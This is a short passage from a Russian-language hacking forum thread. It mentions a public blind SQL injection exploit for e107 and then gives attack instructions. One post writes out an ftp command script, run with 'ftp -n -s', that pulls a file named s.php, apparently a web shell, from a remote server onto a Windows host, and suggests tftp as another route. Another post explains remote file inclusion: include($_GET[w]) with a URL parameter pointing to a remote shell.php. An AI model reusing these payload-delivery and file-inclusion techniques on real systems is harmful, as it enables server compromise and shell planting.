Привет всем!
есть уязвимость "e107 <= 0.7.13 (usersettings.php) Blind SQL Injection Exploit"
вот эксплоит: http://www.securitylab.ru/poc/extra/361578.php
Вот что выдаёт:
@diznt
я же тебе уже написал в прошлой теме, что так должно быть: при выполнении команды ftp пользователю предлагается ввести команды в консоли ftp. Я же писал выполни ftp /? узнаешь список команд. Если ты такой ленивый, то вот пример скачивания файла с удаленного ftp:
Код:
open ftp.someserver.com
user username password
ascii
cd /htdocs
get s.php
bye
затем сохраняешь это в файл ftp.txt и выполняешь команду в cmd:
ftp -n -s:C:\ftp.txt
В итоге ты скачаешь файл s.php с ftp-сервера под учетной записью пользователя username с паролем password
Или используй tftp, скачивай сервер по ссылке, которую я уже давал и запускай на своем компе, указав папку с доступными для скачивания файлами.
есть язык программирования php.
в нем есть код.
в этом коде можно написать include($_GET[w]) и теперь при обращении к странице site.ru/index.php?w=http://ya.ru/shell.php мы можем использовать код из файла shell.php. Инклуд нужен, чтобы встраивать в код скрипта код из другого файла. как-то так) если не понял-пиши)